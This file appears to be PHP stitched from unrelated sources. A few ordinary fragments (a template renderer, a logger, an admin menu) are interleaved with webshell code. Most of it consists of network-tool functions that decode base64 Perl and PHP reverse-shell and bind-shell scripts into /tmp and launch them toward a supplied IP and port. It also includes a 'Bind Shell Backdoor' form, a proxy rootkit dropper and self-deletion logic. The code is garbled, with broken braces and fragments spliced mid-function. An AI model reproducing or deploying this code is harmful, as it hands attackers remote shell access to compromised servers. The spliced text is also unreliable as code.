private function pageOut($templateName, $t = array())
{
//include template for whatever purpose
$layout = !empty($GLOBALS['layout']) ? $GLOBALS['layout'] : cf('layouts', 'default');
if (self::get($templateName, 'data') != '') {
$t = array_merge($t, include self::get($templateName, 'data'));
}
if (self::get($templateName, 'stub') == true || self::get($templateName, 'standalone') == true || empty($layout)) {
template::plainInclude(self::get($templateName), $t);
} else {
//what layout should i use?
$t['child'] = self::get($templateName);
//let the page layout know what to include
$t['css'] = array_merge((array) $t['css'], (array) self::get($templateName, 'css'), (array) self::get($layout, 'css'));
$t['js'] = array_merge((array) $t['js'], (array) self::get($layout, 'js'), (array) self::get($templateName, 'js'));
template::plainInclude(self::get($layout), $t);
}
}
function log($type, $description)
{
if ($this->cf['logTo'] != 'nowhere') {
if ($this->cf['logTo'] == 'output') {
if ($type == 'db' || $type == 'error') {
echo "<div style='background: orange; color:black; font-weght:bold'> error ({$type}). {$description} </div>";
}
} else {
$trace = debug_backtrace();
if (cf('debug') > 2 && in_array($type, array('error', 'db'))) {
echo "({$type}) {$description} in " . $this->db->esc($trace[1]['file']) . "on line " . $trace[1]['line'] . "<br />";
}
if (cf('debug') > 4) {
$GLOBALS['errors']->add("({$type}) {$description}", 'log');
}
$this->db->rawQuery("INSERT INTO " . $this->logTable . " SET type=" . $this->db->esc($type) . ", description=" . $this->db->esc($description) . ', file=' . $this->db->esc($trace[1]['file']) . ', line=' . $this->db->esc($trace[1]['line']) . ";") or die("INSERT INTO {$logTable} SET type=" . $this->db->esc($type) . ", description=" . $this->db->esc($description) . ', file=' . $this->db->esc($trace[1]['file']) . ', line=' . $this->db->esc($trace[1]['line']) . ";" . mysql_error($this->db->db));
}
}
}
unlink("/tmp/back");
}
}
$_POST['backcconnmsg'] = "Try1ng 70 c0nn3c7 70 <b>" . $_POST['backconnectip'] . "</b> 0n p0r7 <b>" . $_POST['backconnectport'] . "</b>.";
}
if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && $_POST['use'] == "C") {
if (is_writable(".")) {
cf("backc", $bc_c);
ex("chmod 777 backc");
$blah = ex("./backc " . $_POST['backconnectip'] . " " . $_POST['backconnectport'] . " &");
if (file_exists("backc")) {
unlink("backc");
}
} else {
ex("chmod 777 /tmp/backc");
cf("/tmp/backc", $bc_c);
$blah = ex("/tmp/backc " . $_POST['backconnectip'] . " " . $_POST['backconnectport'] . " &");
if (file_exists("/tmp/backc")) {
unlink("/tmp/backc");
}
}
$_POST['backcconnmsg'] = "Trying to connect to <b>" . $_POST['backconnectip'] . "</b> on port <b>" . $_POST['backconnectport'] . "</b>.";
}
@ini_set("max_execution_time", 0);
if (!function_exists("gmt")) {
function gmt()
{
list($usec, $sec) = explode(" ", microtime());
return (double) $usec + (double) $sec;
}
}
} elseif (function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif (@is_resource($f = @popen($cfe, "r"))) {
$res = '';
while (!@feof($f)) {
$res .= @fread($f, 1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname, $text)
{
if ($fp = @fopen($fname, 'w')) {
@fputs($fp, @base64_decode($text));
@fclose($fp);
}
}
$yourip = "your IP";
$yourport = 'your port';
$usedb = array('perl' => 'perl', 'c' => 'c');
$back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc', $back_connect);
$res = execute(which('perl') . " /tmp/.bc {$yourip} {$yourport} &");
?>
?>
<li>Files<ul>
<li><a href="index.php?load=files&action=stats">Files statistics</a></li>
<li><a href="index.php?load=files&action=clean">Clean files</a></li>
<?php
if (user_level(4)) {
?>
<li><a href="index.php?load=files&action=edit">Edit file</a></li>
<?php
}
?>
</ul></li>
<?php
}
?>
<li><a href="logout.php">Logout</a></li>
</ul>
<?php
if (!isset($_GET['load'])) {
$_GET['load'] = '';
}
if (!isset($_GET['action'])) {
$_GET['action'] = '';
}
if (cf($file = 'admin/amsn.' . basename(strtolower($_GET['load'])) . '.php')) {
include_once $file;
} else {
echo "<p>Please, select an option from the menu</p>\n";
}
}
//echo '<pre>'; print_r($_SESSION); print_r($_POST); print_r($_GET); print_r($_FILES); echo '</pre>';
function ___onInitializeGlobalClasses()
{
$db = cf('database');
/**
* @global object $GLOBALS['database'] shared database object
* @global object $GLOBALS['db'] shorthand for $GLOBALS['database']
* @see database
*/
$GLOBALS['database'] = new database($db['host'], $db['username'], $db['password'], $db['db']);
$GLOBALS['db'] =& $GLOBALS['database'];
}
$ip = $_SERVER["REMOTE_ADDR"];
$msg = $_POST['backcconnmsg'];
$emsg = $_POST['backcconnmsge'];
echo "<b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value={$ip}> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br>";
echo "{$msg}";
echo "{$emsg}";
}
if ($act == "shbd") {
$msg = $_POST['backcconnmsg'];
$emsg = $_POST['backcconnmsge'];
echo "<b>Bind Shell Backdoor:</b></br></br><form name=form method=POST>\nBind Port: <input type='text' name='backconnectport' value='5992'>\n<input type='hidden' name='use' value='shbd'>\n<input type='submit' value='Install Backdoor'></form>";
echo "{$msg}";
echo "{$emsg}";
}
if ($act == "proxy") {
cf("/tmp/hantu.tgz", $proxy_shit);
ex("cd /tmp;tar -zxvf hantu.tgz");
ex("cd /tmp;cd .setan;chmod 777 xh");
ex("cd /tmp;cd .setan;chmod 777 httpd");
ex("cd /tmp;cd .setan;./xh -s [kmod] ./httpd start");
checkproxyhost();
$msg = $_POST['proxyhostmsg'];
echo "{$msg}";
unlink("/tmp/hantu.tgz");
ex("cd /tmp; rm -r .setan");
}
if ($act == "selfremove") {
if ($submit == $rndcode and $submit != "") {
if (unlink(__FILE__)) {
@ob_clean();
echo "Gone!";
function actionNetwork()
{
wsoHeader();
$back_connect_perl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkg" . "fHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFk" . "ZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7" . "DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVy" . "cm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxu" . "Iik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsN" . "Cm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2Uo" . "U1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$back_connect_tty_perl = "IyEvdXNyL2Jpbi9wZXJsIC13DQp1c2UgSU86OlNvY2tldDsNCnVzZSBGY250bDsNCiRUSU9DR1BU" . "TiA9IC0yMTQ3MTk5OTUyOyRUSU9DU1BUTENLID0gMTA3NDAyNTUyMTskRUFHQUlOPTExOyRIT1NU" . "PSRBUkdWWzBdOyRQT1JUPSRBUkdWWzFdOyQwPSJhcGFjaGUiOw0KJHNvY2sgPSBuZXcgSU86OlNv" . "Y2tldDo6SU5FVCAoUGVlckFkZHIgPT4gJEhPU1QsUGVlclBvcnQgPT4gJFBPUlQsUHJvdG8gPT4g" . "J3RjcCcsQmxvY2tpbmcgPT4gMCwpIG9yIGRpZSAkITsNCnN5c29wZW4gKFBUTVgsICcvZGV2L3B0" . "bXgnLCBPX1JEV1J8T19OT05CTE9DSykgb3IgZGllICQhOyR0bXA9Jyc7aW9jdGwgKFBUTVgsICRU" . "SU9DR1BUTiwgJHRtcCkgb3IgZGllICQhOw0KJHB0cyA9IHVucGFjaygnaScsICR0bXApOyR1bmxv" . "Y2s9cGFjaygnaScsIDApO2lvY3RsKFBUTVgsICRUSU9DU1BUTENLLCAkdW5sb2NrKSBvciBkaWUg" . "JCE7Y2hkaXIgJy8nIG9yIGRpZSAkITsNCm9wZW4gU1RESU4sICcvZGV2L251bGwnIG9yIGRpZSAk" . "ITt1bWFzayAwO2RlZmluZWQoJHBpZCA9IGZvcmspIG9yIGRpZSAkITtleGl0IGlmICRwaWQ7ZGVm" . "aW5lZCgkcGlkID0gZm9yaykgb3IgZGllICQhOw0KaWYoISRwaWQpe2V4ZWMoIi9zYmluL2dldHR5" . "IC1uIC1sIC9iaW4vYmFzaCAzODQwMCAvZGV2L3B0cy8kcHRzIikgb3IgZXhlYygiL2Jpbi9iYXNo" . "IDwvZGV2L3B0cy8kcHRzID4vZGV2L3B0cy8kcHRzIDI+L2Rldi9wdHMvJHB0cyIpIG9yIGRpZSAk" . "ITsNCmV4aXQ7fW9wZW4gU1RET1VULCAnPj4vZGV2L251bGwnIG9yIGRpZSAkITtvcGVuIFNUREVS" . "UiwgJz4+L2Rldi9udWxsJyBvciBkaWUgJCE7JHBwID0gUFRNWDskcmluPSR3aW49JGVpbj0nJzsN" . "CnZlYygkcmluLGZpbGVubygkcHApLDEpID0xO3ZlYygkcmluLGZpbGVubygkc29jayksMSkgPSAx" . "O3NlbGVjdCAkc29jazskfD0xO3NlbGVjdCBQVE1YOyR8PTE7c2VsZWN0IFNURE9VVDsNCiR8PTE7" . "JGZpbmlzaGVkPTA7c3ViIGZvcndhcmRkYXRhIHtteSAoJGZyb20sJHRvKSA9IEBfO3doaWxlKDEp" . "IHskcnYgPSBzeXNyZWFkKCRmcm9tLCAkYnVmZiwgMTAyNCk7DQpsYXN0IGlmICghZGVmaW5lZCgk" . "cnYpICYmICQhID09ICRFQUdBSU4pO2RlZmluZWQoJHJ2KSBvciBkaWUgJCE7aWYgKCRydiA9PSAw" . "KSB7ICRmaW5pc2hlZCA9IDE7IGxhc3Q7fQ0Kd2hpbGUobGVuZ3RoICRidWZmID4gMCkgeyRydiA9" . "IHN5c3dyaXRlKCR0bywgJGJ1ZmYsIGxlbmd0aCAkYnVmZik7aWYgKCFkZWZpbmVkKCRydikgJiYg" . "JCEgPT0gJEVBR0FJTikge25leHQ7fQ0KZGVmaW5lZCgkcnYpIG9yIGRpZSAkITtsYXN0IGlmICgk" . "cnYgPT0gbGVuZ3RoICRidWZmKTtzdWJzdHIoJGJ1ZmYsMCwkcnYpID0gJyc7fX19d2hpbGUoISAk" . "ZmluaXNoZWQpIHsNCiRuZm91bmQgPSBzZWxlY3QoJHJvdXQ9JHJpbiwgJHdvdXQ9JHdpbiwgJGVv" . "dXQ9JGVpbiwgdW5kZWYpO2RpZSAkISBpZiAoJG5mb3VuZCA9PSAtMSk7Zm9yd2FyZGRhdGEoJHBw" . "LCRzb2NrKTsNCmxhc3QgaWYgJGZpbmlzaGVkO2ZvcndhcmRkYXRhKCRzb2NrLCRwcCk7bGFzdCBp" . "ZiAkZmluaXNoZWQ7fWNsb3NlIFBUTVg7Y2xvc2UgJHNvY2s7JHdvdXQ9JGVvdXQuJHdvdXQuJHJv" . "dXQ7";
$back_connect_php = "PD9waHANCnNldF90aW1lX2xpbWl0KDApOw0KJGlwID0gJGFyZ3ZbMV07JHBvcnQgPSAkYXJndlsy" . "XTskc2hlbGwgPSAndW5hbWUgLWE7IHc7IGlkOyAvYmluL3NoIC1pJzskY2h1bmtfc2l6ZSA9IDE0" . "MDA7JHdyaXRlX2EgPSBudWxsOw0KJGVycm9yX2EgPSBudWxsOyRkYWVtb24gPSAwOyRkZWJ1ZyA9" . "IDA7DQppZihmdW5jdGlvbl9leGlzdHMoJ3BjbnRsX2ZvcmsnKSl7JHBpZCA9IHBjbnRsX2Zvcmsg" . "KCk7aWYoJHBpZCA9PSAtMSl7cHJpbnRpdCAoJ0VSUk9SOiBDYW5cJ3QgZm9yaycpO2V4aXQoMSk7" . "fQ0KaWYoJHBpZCl7ZXhpdCgwKTt9aWYocG9zaXhfc2V0c2lkICgpID09IC0xKXtwcmludGl0KCdF" . "cnJvcjogQ2FuXCd0IHNldHNpZCgpJyk7ZXhpdCgxKTt9JGRhZW1vbiA9IDE7DQp9ZWxzZXtwcmlu" . "dGl0KCdXQVJOSU5HOiBGYWlsZWQgdG8gZGFlbW9uaXNlLiBUaGlzIGlzIHF1aXRlIGNvbW1vbiBh" . "bmQgbm90IGZhdGFsLicpO30NCmNoZGlyICgnLycpOw0KdW1hc2sgKDApOw0KJHNvY2sgPSBmc29j" . "a29wZW4gKCRpcCwgJHBvcnQsICRlcnJubywgJGVycnN0ciwgMzApOw0KaWYgKCEkc29jaykgew0K" . "cHJpbnRpdCAoInskZXJyc3RyfSAoeyRlcnJub30pIik7DQpleGl0KDEpOw0KfQ0KJGRlc2NyaXB0" . "b3JzcGVjID0gYXJyYXkgKDAgPT4gYXJyYXkoInBpcGUiLCAiciIpLA0KICAgICAgICAgICAgICAg" . "ICAgICAgMSA9PiBhcnJheSgicGlwZSIsICJ3IiksDQogICAgICAgICAgICAgICAgICAgICAyID0+" . "IGFycmF5KCJwaXBlIiwgInciKSk7DQokcHJvY2VzcyA9IHByb2Nfb3BlbiAoJHNoZWxsLCAkZGVz" . "Y3JpcHRvcnNwZWMsICRwaXBlcyk7DQppZiAoIWlzX3Jlc291cmNlICgkcHJvY2Vzcykpew0KcHJp" . "bnRpdCAoJ0VSUk9SOiBDYW5cJ3Qgc3Bhd24gc2hlbGwnKTsNCmV4aXQgKDEpOw0KfQ0Kc3RyZWFt" . "X3NldF9ibG9ja2luZyAoJHBpcGVzWzBdLCAwKTsNCnN0cmVhbV9zZXRfYmxvY2tpbmcgKCRwaXBl" . "c1sxXSwgMCk7DQpzdHJlYW1fc2V0X2Jsb2NraW5nICgkcGlwZXNbMl0sIDApOw0Kc3RyZWFtX3Nl" . "dF9ibG9ja2luZyAoJHNvY2ssIDApOw0KcHJpbnRpdCAoJ1N1Y2Nlc3NmdWxseSBvcGVuZWQgcmV2" . "ZXJzZSBzaGVsbCB0byAnIC4gJGlwIC4gJzonIC4gJHBvcnQpOw0Kd2hpbGUgKDEpIHsNCmlmKGZl" . "b2YgKCRzb2NrKSl7DQogIHByaW50aXQgKCdFUlJPUjogU2hlbGwgY29ubmVjdGlvbiB0ZXJtaW5h" . "dGVkJyk7DQogIGJyZWFrOw0KfQ0KaWYoZmVvZiAoJHBpcGVzWzFdKSl7DQogICBwcmludGl0ICgn" . "RVJST1I6IFNoZWxsIHByb2Nlc3MgdGVybWluYXRlZCcpOw0KICAgYnJlYWs7DQp9DQokcmVhZF9h" . "ID0gYXJyYXkgKCRzb2NrLCAkcGlwZXNbMV0sICRwaXBlc1syXSk7DQokbnVtX2NoYW5nZWRfc29j" . "a2V0cyA9IHN0cmVhbV9zZWxlY3QgKCRyZWFkX2EsICR3cml0ZV9hLCAkZXJyb3JfYSwgbnVsbCk7" . "DQppZihpbl9hcnJheSAoJHNvY2ssICRyZWFkX2EpKXsNCiAgaWYgKCRkZWJ1ZykgcHJpbnRpdCAo" . "J1NPQ0sgUkVBRCcpOw0KICAkaW5wdXQgPSBmcmVhZCAoJHNvY2ssICRjaHVua19zaXplKTsNCiAg" . "aWYgKCRkZWJ1ZykgcHJpbnRpdCAoJ1NPQ0s6ICcgLiAkaW5wdXQpOw0KICBmd3JpdGUgKCRwaXBl" . "c1swXSwgJGlucHV0KTsNCn0NCmlmKGluX2FycmF5ICgkcGlwZXNbMV0sICRyZWFkX2EpKXsNCiAg" . "aWYgKCRkZWJ1ZykgcHJpbnRpdCAoJ1NURE9VVCBSRUFEJyk7DQogICRpbnB1dCA9IGZyZWFkKCRw" . "aXBlc1sxXSwgJGNodW5rX3NpemUpOw0KICBpZiAoJGRlYnVnKSBwcmludGl0KCdTVERPVVQ6ICcg" . "LiAkaW5wdXQpOw0KICBmd3JpdGUgKCRzb2NrLCAkaW5wdXQpOw0KfQ0KaWYoaW5fYXJyYXkgKCRw" . "aXBlc1syXSwgJHJlYWRfYSkpew0KICBpZiAoJGRlYnVnKSBwcmludGl0KCdTVERFUlIgUkVBRCcp" . "Ow0KICAkaW5wdXQgPSBmcmVhZCAoJHBpcGVzWzJdLCAkY2h1bmtfc2l6ZSk7DQogIGlmICgkZGVi" . "dWcpIHByaW50aXQoJ1NUREVSUjogJyAuICRpbnB1dCk7DQogIGZ3cml0ZSAoJHNvY2ssICRpbnB1" . "dCk7DQp9DQp9DQpmY2xvc2UgKCRzb2NrKTsNCmZjbG9zZSAoJHBpcGVzWzBdKTsNCmZjbG9zZSAo" . "JHBpcGVzWzFdKTsNCmZjbG9zZSAoJHBpcGVzWzJdKTsNCnByb2NfY2xvc2UgKCRwcm9jZXNzKTsN" . "CmZ1bmN0aW9uIHByaW50aXQoJHN0cmluZyl7aWYoISRkYWVtb24pe3ByaW50ICJ7JHN0cmluZ31c" . "biI7fX0NCj8+IA==";
$bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBl" . "eGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdld" . "HByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2" . "Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEF" . "SR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywz" . "KSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sU" . "yk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZC" . "AkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQo" . "JCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAi" . "Q2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
echo "<h1>Network tools</h1><div class=content>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">\r\n\t<span>Bind port to /bin/sh [perl]</span><br/>\r\n\tPort: <input type='text' name='port' value='443'> <input type=submit value='>>'>\r\n\t</form>\r\n\t<form name='nfp' onSubmit=\"g2(null,null,'bcp',this.server.value,this.port.value,this.bcpath.value,this.bctype.value);return false;\"><br>\r\n\t<span>Back-connect</span><br/>\r\n\t<table cellpadding='1' cellspacing='0' width='50%'>\r\n\t<tr><td>Type:</td><td><select name='bctype'><option value='1' >Perl</option><option value='2' >TTY Perl</option><option value='3'>PHP</option></select></td></tr>\r\n\t<tr><td width='1%'>Path:</td><td><input type='text' id='bcpath' name='bcpath' value='/tmp/'> <a href='#' onClick=\"document.getElementById('bcpath').value='" . $_POST['c'] . "'\">or this path</a></td></tr>\r\n\t<tr><td>Server:</td><td><input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "' size='15'>:<input type='text' name='port' value='443' size='4'></td></tr><tr><td><input type=submit value='>>'></td></tr>\r\n\t</table></form><br>";
if (isset($_POST['p1'])) {
function cf($f, $t)
{
$w = @fopen($f, "w") or @function_exists('file_put_contents');
if ($w) {
@fwrite($w, @base64_decode($t));
@fclose($w);
}
}
if ($_POST['p1'] == 'bpp') {
print_r($_POST);
exit;
cf("/tmp/bp.pl", $bind_port_p);
$out = wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &");
sleep(1);
echo "<pre class=ml1>{$out}\n" . wsoEx("ps aux | grep bp.pl") . "</pre>";
unlink("/tmp/bp.pl");
}
if ($_POST['p1'] == 'bcp') {
switch ($_POST['p5']) {
case 1:
$back_connect_p = $back_connect_perl;
$l = gphp('perl');
break;
case 2:
$back_connect_p = $back_connect_tty_perl;
$l = gphp('perl');
break;
case 3:
$back_connect_p = $back_connect_php;
$l = gphp('php');
break;
}
$_POST['p4'] = (substr($_POST['p4'], -1, 1) == '/' or substr($_POST['p4'], -1, 1) == '\\') ? trim($_POST['p4']) . 'caches' : trim($_POST['p4']) . '/caches';
cf($_POST['p4'], $back_connect_p);
$out = wsoEx($l . " " . $_POST['p4'] . " " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
sleep(1);
echo "<pre class=ml1>{$out}\n" . wsoEx("ps aux | grep caches") . "</pre>";
unlink($_POST['p4']);
}
}
echo '</div>';
wsoFooter();
}
function actionNetwork()
{
wsoHeader();
$back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
echo "<h1>Network tools</h1><div class=content> \n \n <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\"> \n <span>Bind port to /bin/sh [perl]</span><br/> \n Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'> \n </form> \n <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\"> \n <span>Back-connect [perl]</span><br/> \n Server: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'> \n \n </form><br>";
if (isset($_POST['p1'])) {
function cf($f, $t)
{
$w = @fopen($f, "w") or @function_exists('file_put_contents');
if ($w) {
@fwrite($w, @base64_decode($t));
@fclose($w);
}
}
if ($_POST['p1'] == 'bpp') {
cf("/tmp/bp.pl", $bind_port_p);
$out = wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &");
echo "<pre class=ml1>{$out}\n" . wsoEx("ps aux | grep bp.pl") . "</pre>";
unlink("/tmp/bp.pl");
}
if ($_POST['p1'] == 'bcp') {
cf("/tmp/bc.pl", $back_connect_p);
$out = wsoEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
echo "<pre class=ml1>{$out}\n" . wsoEx("ps aux | grep bc.pl") . "</pre>";
unlink("/tmp/bc.pl");
}
}
echo '</div>';
wsoFooter();
}
}
if (function_exists("apc_store")) {
$commit = apc_fetch($project . "/commit");
}
if (strlen($commit) > 1) {
$commit = json_decode($commit, 1);
$commit = $commit["commit"];
$readme .= "### Author\n" . $commit["author"]["name"] . "\n\n";
$date = date("M d, Y", strtotime($commit["committed_date"]));
$readme .= "### Last Commit - ";
$readme .= $commit["committer"]["name"] . " on {$date}\n\n";
$readme .= $commit["message"] . "\n\n";
$readme .= "#### Changed Files\n\n";
$readme .= cf("Added", $commit, "added", "a");
$readme .= cf("Modified", $commit, "modified", "m");
$readme .= cf("Removed", $commit, "removed", "r");
}
}
echo Markdown($readme);
} else {
?>
<h1>Projects</h1>
<p>
The big bucket of projects! Click a link on the right to browser
project details. This is all the open source work we know about thats
going on right now. Note that some of these are libraries or tools,
some are integration projects, and most are BrowserPlus services.
</p>
<p>
function yemenconnect()
{
yemenhead();
$back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
echo "<div class=header><center><h3><span>| PERL AND PHP(threads) BACK CONNECT |</span></h3>";
echo "<form onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\"><span>PERL BACK CONNECT</span><br>IP: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form>";
echo "<br><form onSubmit=\"g(null,null,'php',this.server.value,this.port.value);return false;\"><span>PHP BACK CONNECT</span><br>IP: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form></center>";
if (isset($_POST['p1'])) {
function cf($f, $t)
{
$w = @fopen($f, "w") or @function_exists('file_put_contents');
if ($w) {
@fwrite($w, base64_decode($t));
@fclose($w);
}
}
if ($_POST['p1'] == 'bcp') {
cf("/tmp/bc.pl", $back_connect_p);
$out = yemenEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
